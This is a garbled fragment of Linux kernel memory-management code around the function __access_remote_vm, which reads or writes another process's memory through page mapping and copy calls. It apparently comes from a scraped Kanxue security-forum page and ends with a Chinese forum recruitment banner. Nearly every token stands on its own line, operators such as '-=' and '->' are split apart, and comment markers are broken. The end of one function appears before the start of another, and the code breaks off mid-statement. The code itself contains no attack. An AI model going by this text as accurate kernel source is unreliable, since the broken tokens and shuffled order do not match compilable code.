if
(bytes > PAGE_SIZE
-
offset)
bytes
=
PAGE_SIZE
-
offset;
maddr
=
kmap(page);
if
(write) {
copy_to_user_page(vma, page, addr,
maddr
+
offset, buf, bytes);
set_page_dirty_lock(page);
}
else
{
copy_from_user_page(vma, page, addr,
buf, maddr
+
offset, bytes);
}
kunmap(page);
page_cache_release(page);
}
len
-
=
bytes;
buf
+
=
bytes;
addr
+
=
bytes;
}
up_read(&mm
-
>mmap_sem);
return
buf
-
old_buf;
}
/
*
*
Access another process' address space as given
in
mm. If non
-
NULL, use the
*
given task
for
page fault accounting.
*
/
static
int
__access_remote_vm(struct task_struct
*
tsk, struct mm_struct
*
mm,
unsigned
long
addr, void
*
buf,
int
len
,
int
write)
{
struct vm_area_struct
*
vma;
void
*
old_buf
=
buf;
down_read(&mm
-
>mmap_sem);
/
*
ignore errors, just check how much was successfully transferred
*
/
while
(
len
) {
int
bytes, ret, offset;
void
*
maddr;
struct page
*
page
=
NULL;
ret
=
get_user_pages(tsk, mm, addr,
1
,
write,
1
, &page, &vma);
if
(ret <
=
0
) {
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!